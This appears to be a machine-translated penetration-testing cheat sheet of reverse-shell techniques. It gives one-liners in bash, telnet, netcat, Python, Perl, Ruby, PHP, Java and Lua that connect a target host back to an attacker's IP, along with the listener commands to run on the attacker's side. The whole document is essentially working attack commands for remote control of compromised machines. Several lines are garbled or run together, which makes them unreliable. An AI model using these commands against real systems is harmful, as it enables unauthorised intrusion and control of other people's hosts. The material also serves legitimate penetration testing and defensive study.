0x00 Preface

During penetration testing , Get the webshell in the future , If the target host is Windows host , By opening 3389 The port is connected remotely , If the target host is linux The server , Generally, we will choose to rebound shell To operate . Here is a summary of the rebound shell Several common postures .

0x01 Bash rebound

1.1 Method 1

The attacker performs listening on the host ：

nc -lvvp port

Execute on the target host ：

bash -i >& /dev/tcp/x.x.x.x/port 0>&1#bash -i    Open an interactive bash#>&    Redirect standard error output to standard output #/dev/tcp/x.x.x.x/port    Means to call socket, establish socket Connect , among x.x.x.x For the host to bounce to ip,port Is the port #0>&1    Redirect standard input to standard output , Realize your relationship with the rebound shell Interaction 

notes ：/dev/tcp/  yes Linux A special device in , Opening this file is equivalent to sending out a socket call , Build a socket Connect , Reading and writing this document is equivalent to reading and writing this document socket Transferring data in a connection . Empathy ,Linux There is still /dev/udp/.

inux shell The following file descriptors are commonly used ：

1. The standard input (stdin) ： The code is 0 , Use < or << ;

2. standard output (stdout)： The code is 1 , Use > or >> ;

3. Standard error output (stderr)： The code is 2 , Use 2> or 2>>.

In addition, due to different Linux Differences between distributions , This command may not work on some systems .

1.2 Method 2

exec 0&0 2>&00<&196;exec 196<>/dev/tcp/x.x.x.x/4444; sh <&196 >&196 2>&196/bin/bash  -i > /dev/tcp/x.x.x.x/8080 0<&1 2>&1

1.3 Method 3

exec 5<>/dev/tcp/x.x.x.x/4444;cat <&5 | while read line; do $line 2>&5 >&5; done

0x02 telnet rebound

2.1 Method 1

Open two terminals on the attacker's host to listen ：

nc -lvvp 4444nc -lvvp 5555

Execute on the target host ：​​

telnet x.x.x.x 4444 | /bin/bash | telnet x.x.x.x 5555

Monitor two ports for input and output respectively , among x.x.x.x All attackers ip

rebound shell After success , Monitoring 4444 When the command is executed in the terminal of the port, the command execution result can be seen in another terminal .

2.2 Method 2

rm -f /tmp/p; mknod /tmp/p p && telnet x.x.x.x 4444 0/tmp/p

0x03 nc（netcat） rebound

The attacker listens to the execution of commands on the host ：

nc -lvvp port

Execute on the target host ：

nc -e /bin/bash x.x.x.x port

If the target host linux The release doesn't have -e Parameters , There are also the following ways ：

rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc x.x.x.x 9999 >/tmp/f

notes ：mkfifo The function of the command is to create FIFO Special documents , Also commonly known as named pipes ,FIFO File has no data block on disk , It is only used to identify one channel in the kernel , Each process can be opened FIFO Document carried out read/write, It's actually reading and writing kernel channels （ The root cause is FIFO The file structure points to read、write Functions are different from regular files ）, This enables interprocess communication

nc x.x.x.x 4444|/bin/bash|nc x.x.x.x 5555   # from 4444 Port get command ,bash  After running, return the command execution result to  5555  port , The attacker also opens two terminals on the host to listen .nc -c /bin/sh x.x.x.x 4444/bin/sh | nc x.x.x.x 4444

0x04 Common script bounce

4.1 python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

4.2 perl

4.2.1 Method 1

perl -e 'use Socket;$i="x.x.x.x";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

4.2.2 Method 2

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"x.x.x.x:5555");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

4.3 Ruby

4.3.1 Method 1

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("x.x.x.x","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

4.3.2 Method 2

ruby -rsocket -e'f=TCPSocket.open("x.x.x.x",5555).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

4.4 PHP

php -r '$sock=fsockopen("x.x.x.x",5555);exec("/bin/bash -i <&3 >&3 2>&3");'

4.5 Java

public class Revs {/*** @param args* @throws Exception */public static void main(String[] args) throws Exception {    // TODO Auto-generated method stub    Runtime r = Runtime.getRuntime();    String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/5555;cat <&5 | while read line; do $line 2>&5 >&5; done"};    Process p = r.exec(cmd);    p.waitFor();}}

4.6 Lua

lua -e "require('socket');require('os');t=socket.tcp();t:connect('x.x.x.x','5555');os.execute('/bin/sh -i <&3 >&3 2>&3');"

notes ： The above script is executed on the target host , among x.x.x.x All attackers ip, And you need to listen on the attacker's host :

nc -lvvp 5555

0x05 summary

The above mentioned is a common rebound shell The way , There must be other ways , Welcome to add , Here will also be constantly updated .

0x06 Refer to the connection

https://www.bertramc.cn/2017/07/14/38.html
http://www.myh0st.cn/index.php/archives/237/
https://www.anquanke.com/post/id/85712
https://blog.csdn.net/wanzt123/article/details/81879599